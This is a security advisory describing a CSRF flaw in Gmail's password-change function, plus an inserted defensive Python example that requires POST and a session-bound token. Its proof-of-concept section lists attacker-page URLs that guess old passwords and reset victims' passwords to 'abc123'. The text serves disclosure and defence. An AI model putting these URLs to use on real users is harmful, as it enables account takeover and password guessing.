Summary
Gmail is Google's "free webmail service. It comes with built-in Google search technology and over 2,600 megabytes of storage (and growing every day). You can keep all your important messages, files and pictures forever, use search to quickly and easily find anything you're looking for, and make sense of it all with a new way of viewing messages as part of conversations".
Cross-Site Request Forgery, also known as one click attack or session riding and abbreviated as CSRF (Sea-Surf) or XSRF, is a kind of malicious exploit of websites. Although this type of attack has similarities to cross-site scripting (XSS), cross-site scripting requires the attacker to inject unauthorized code into a website, while cross-site request forgery merely transmits unauthorized commands from a user the website trusts.
GMail is vulnerable to CSRF attacks in the "Change Password" functionality. The only token used to authenticate the user is a session cookie, and the browser sends this cookie automatically with every request.
An attacker can create a page that issues requests to the "Change Password" functionality of GMail and changes the passwords of users who visit the attacker's page while authenticated.
The attack is made easier because the "Change Password" request can be made with the HTTP GET method instead of the POST method that the "Change Password" form normally uses.
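A server-side check that closes both gaps described above, as an added example that is not part of the original advisory or of Google's code: the handler refuses GET for the state change and requires a token bound to the session. The function names, the `csrf_token` field and the session identifiers are assumptions; the other field names are the parameters shown in the proof of concept.

```python
import hashlib
import hmac
import secrets

# Assumption: per-deployment secret; a real service loads it from protected storage.
SERVER_KEY = secrets.token_bytes(32)

def issue_csrf_token(session_id: str) -> str:
    """Token the server embeds in its own form, bound to one session by HMAC."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()

def check_password_change(method: str, session_id: str, params: dict) -> tuple:
    """Decide whether a change-password request may proceed: (allowed, reason)."""
    # Embedded images and frames on a third-party page issue GET requests,
    # so a state change must never be reachable that way.
    if method.upper() != "POST":
        return False, "method not allowed"
    # The session cookie is attached by the browser to every request and says
    # nothing about intent; require a value that a foreign page cannot read.
    supplied = str(params.get("csrf_token", ""))
    expected = issue_csrf_token(session_id)
    if not hmac.compare_digest(supplied.encode(), expected.encode()):
        return False, "missing or invalid CSRF token"
    if not params.get("Passwd") or params.get("Passwd") != params.get("PasswdAgain"):
        return False, "new password fields do not match"
    return True, "ok"

# Constructed sample data: session identifiers and form values are made up.
SESSION = "session-A"
FIELDS = {"OldPasswd": "current-pw", "Passwd": "new-pw", "PasswdAgain": "new-pw"}

def demo() -> list:
    own_token = dict(FIELDS, csrf_token=issue_csrf_token(SESSION))
    other_token = dict(FIELDS, csrf_token=issue_csrf_token("session-B"))
    return [
        check_password_change("GET", SESSION, own_token),     # cross-site GET
        check_password_change("POST", SESSION, FIELDS),       # cookie only
        check_password_change("POST", SESSION, other_token),  # token of another session
        check_password_change("POST", SESSION, own_token),    # the site's own form
    ]

if __name__ == "__main__":
    for result in demo():
        print(result)
```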
DETAILS
Proof of concept:
1. An attacker creates a web page "csrf-attack.html" that makes many HTTP GET requests to the "Change Password" functionality.
For example, a password-cracking run of 3 attempts (see the "OldPasswd" parameter):
...
src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd& OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc123&p=&save=Save">
src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd& OldPasswd=PASSWORD2&Passwd=abc123&PasswdAgain=abc123&p=&save=Save">
src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd& OldPasswd=PASSWORD3&Passwd=abc123&PasswdAgain=abc123&p=&save=Save">
...
or with hidden frames:
...